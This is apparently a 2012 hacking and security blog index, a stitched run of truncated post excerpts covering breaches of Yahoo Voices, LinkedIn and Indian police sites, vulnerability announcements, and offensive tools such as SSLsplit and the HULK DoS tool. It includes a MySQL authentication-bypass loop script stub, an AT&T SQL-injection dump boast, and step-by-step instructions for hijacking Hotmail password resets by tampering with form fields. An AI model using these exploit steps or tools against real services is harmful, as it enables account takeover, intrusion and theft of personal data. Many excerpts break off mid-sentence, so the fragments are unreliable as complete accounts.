MultiObfuscator 2.00

Please download this app. from Source.

MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.


Source: http://packetstormsecurity.org/files/114693

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

435,000 Yahoo usernames and passwords hacked and exposed

If you’re a Yahoo Voices user, it’s time to change your password.
Security for the service appears to have been compromised early Thursday morning. A list titled “Owned and Exposed” which is “brought to you by the D33Ds Company” was posted online revealing a number of details for the service including all of the email addresses and passwords for Yahoo Voices’ 450,000 users.

In checking the usernames, I was able to ascertain it is actually Yahoo! Voices that was affected.
That’s significant, because 435,000 is similar enough to the 600,000 users Yahoo currently references on the Voices website to conceivably be the contributor database as it existed some months or years in the past.
The passwords contained a wide variety of email addresses including those from yahoo.com, gmail.com, aol.com, and much more. The affected website was only named as a subdomain

of yahoo.com however digging through and searching for the hostname, the attacker forgot to remove the hostname “dbb1.ac.bf1.yahoo.com” (credit to Mubix for the hostname find).

Username Password List

TN Cyber Crime Cell to investigate hacking of website

The Tamil Nadu police on Tuesday night said the Cyber Crime Cell has been asked to investigate the hacking of its website by Anonymous, a ‘hacktivist’ group.

In a statement here, Director General of Police K. Ramanujam said no defacing of the police website had taken place. “Data in the grievances database relating to complaints received online from the public and action taken on them have been taken and published,” he said.



The website, now being maintained by National Informatics Centre,a Science and Technology institution of the Centre, was intruded reportedly by 'Anonymous,' which has been protesting denial of access to certain websites by Internet Service Providers in pursuance of a copyright violation suit.

Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges

This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.




Let us focus on our own and

Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS

================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \

================================================================================
##

DNS Changer ทำงานยังไงกันแน่

เป็นประเด็นค่อนข้างมากกับเรื่อง Malware ที่ชือว่า DNS Changer วันนี้ขอหยิบยกมาพูดหน่อยละกันครับ

ก่อนที่จะรู้ว่า DNS Changer ทำงานยังไง เรามาดูก่อนดีกว่าว่า DNS คืออะไรครับ

DNS คืออะไร
โดยปกติแล้วการเข้าไปใช้งานเว็บไซด์ต่างๆ จะไม่ได้ติดต่อกันด้วยชื่อของเว็บไซด์อย่าง www.facebook.com, www.google.com หรอกนะ เพราะการเชื่อมต่อเน็ตเวิร์คต่างๆทำด้วย IP Address ส่วนชื่อเว็บไซด์(domain name)

DNSCrypt - encrypts DNS traffic between your computer and OpenDNS

DNSCrypt, as its name suggests, encrypts DNS traffic between your computer and OpenDNS, in the same way SSL turns HTTP traffic into HTTPS encrypted traffic.

Initially, DNSCrypt was announced as being available for Mac only for now, but according to an OpenDNS article posted yesterday, the source code for DNSCrypt was published on GitHub when they've released the Mac preview and even though

AT&T And Hostgator was hack.

<==============================>Target: ATT.comVulnerable Link: REDACTEDVuln. Type: Error-BasedVulnerable paramater: sb=DB: prod<==============================>Well; it just goes to show you, anything is vulnerable. You just have to know where to look. This DB has A LOT of information in it: names, addresses, mobile numbersect..  The information in this dump isn't even 1% of whats in here, I just

CoBank & CitiBank - Internal Access - Hacked!

// c0mrade    // 6-17-12    // Twitter.com/officialcomrade         Hello, my minions. Let me start off by answering some questions.         Q. Do you support Jester?    A. Yes. I do not support the dilettante that follows him around though. They're trying to act as some corporate spies. It's funny. Jester has that part of the scene on lock. Don't even try mining it, please.         Q. Why is your

XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities

$------------------------------------------------------------------------------------------------------------$ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :http://www.apachefriends.org/en/xampp-windows.html $ Date :06/07/2012 $ Twitter: http://twitter.com/Sangte_amtham$***********************************************

F5 BIG-IP remote root authentication bypass Vulnerability (Update Link and payload for Metasploit)

F5 BIG-IP remote root authentication bypass VulnerabilityCVE reference: CVE-2012-1493Affected platforms: BIG-IP platforms without SCCPVersion: 11.x 10.x 9.xDate: 2012-February-16Security risk: HighVulnerability: F5 BIG-IP remote root authentication bypassResearcher: Florent DaigniereVendor Status: Notified / Patch availableVulnerability Disclosure Policy: https://www.trustmatta.com/advisories/

Interesting Vulnerability Today(2012-06-11) Microsoft IIS 6.0, Microsoft IIS 7.5

THIS IS A GENUINE ISOWAREZ RELEASE********************************************************------------------------------------------------------------------------------------------------------------------------------------------------------------Title: Microsoft IIS 6.0 with PHP installed Authentication BypassAffected software:Microsoft IIS 6.0 with PHP installed(tested on Windows Server 2003 SP1

MySQL Authen Bypass Vulnerability On Ubuntu (*update python script)

 This vulnerability was public by @hdmoore, @jcran, @jduck1337 and another security expert guys from my twitter.

This vulnerability effects on Ubuntu/Debian 32/64bit, MySQL 5.5.22 not work on RHEL/CentOS5 and 6 (x86_64)

Python script for this vulnerability

#!/usr/bin/pythonimport subprocesswhile 1:        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait(

Details here:

LinkedIn Leaked hashes password statistics

LinkedIn Leaked hashes password statistics (@StefanVenken)         Based on the leaked 6.5 Million hashes,    1.354.946 were recovered within a few hours time with HashCat / Jtr and publicly found wordlists on a customer grade laptop.         This report was created with pipal from @Digininja         Total entries = 1354946    Total unique entries = 1354946         Top 10 base words    link =

Your LinkedIn password is in the news or not?

Last night, the password(SHA1) of LinkedIn was leaked and if you want to know your password is in the list or not, try this script(from Phobos Technology) for check it. 

if you want to see full details of this news, please go to the Source.

1. Download Password from
http://wordpress.phobostechnology.com/wp-content/uploads/2012/06/combo_not.zip

2. Run this python script.

"""
Save this file as

Facebook Was Shut Down by Anonymous Hackers !

Facebook experienced service outages for portions of its 900 million users tonight after the social networking site was apparently targeted by hacking group Anonymous.
Taking to Twitter to express their displeasure, Facebook users from the United States to Singapore reported being unable to log onto the website for around three hours from approximately 8 p.m till about 11 p.m EST.
The mass outages for the famously reliable social networking site capped off a topsy-turvy two weeks for founder Mark Zuckerberg after Facebook's stock closed at $29.60 per share on Thursday, down 22 percent from its offering price of $38.
Facebook admitted they experienced problems during the evening: 'Earlier today, some users briefly experienced issues loading the site. The issues have since been resolved and everyone should now have access to Facebook. We apologise for any inconvenience.'
However, hacking group Anonymous indicated via its Twitter account that it was behind the slowdown and when asked Facebook did not deny this.
'Looks like good old Facebook is having packet problems' was one tweet posted by @YourAnonNews as well as 'Oh yeah ... RIP Facebook a new sound of tango down, b------.'

On Twitter at around 10 p.m EST, 'RIP Facebook' was among the top ten trending topics in the United States and across the world.
Earlier on in the day members of the Anonymous hacking collective had claimed credit for the attack on the American Nazi Party's website and caused a denial-of-service to the right wing group's internet presence.The site was working again by Thursday evening.
Indeed, even mobile devices were not spared as some Facebook users on iOS and Android devices reported being affected by the outage.
Facebook is famous for not suffering from extensive outages, while users of Twitter have come to expect short interruptions in service.

-dailymail.co.uk

SSLsplit – transparent and scalable SSL/TLS interception

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted
network connections. Connections are transparently intercepted through a
network address translation engine and redirected to SSLsplit. SSLsplit
terminates SSL/TLS and initiates a new SSL/TLS connection to the original
destination address, while logging all data transmitted

HULK, Web Server DoS Tool

Introducing HULK (Http Unbearable Load King).1-twitter-dos-dataIn my line of work, I get to see tons of different nifty hacking tools, and traffic generation tools that are meant to either break and steal information off a system, or exhaust its resource pool, rendering the service dead and putting the system under a denial of service.For a while now, I have been playing with some of the more

Interesting Public Vulnerabilities (2012-05-04)

Drupal Core 7.x Denial Of Service / Access Bypass 
http://packetstormsecurity.org/files/112437
Tor Proxy Bypass Via Firefox 
http://packetstormsecurity.org/files/112439
Joomla 2.5.4 Cross Site Scripting 
http://packetstormsecurity.org/files/112451
PHP Vulnerability Source Code Leak And Remote Code Execution
http://www.php.net/archive/2012.php#id2012-05-03-1https://bugs.php.net/bug.php?id=61910

Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities

1.) Hotmail :
Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .Step 2. Enter the Target Email and enter the 6 characters you see.Step 3. Start Tamper DataStep 4. Delete Element "SendEmail_ContinueCmd"Step 5. change Element "__V_previousForm" to "ResetOptionForm"Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%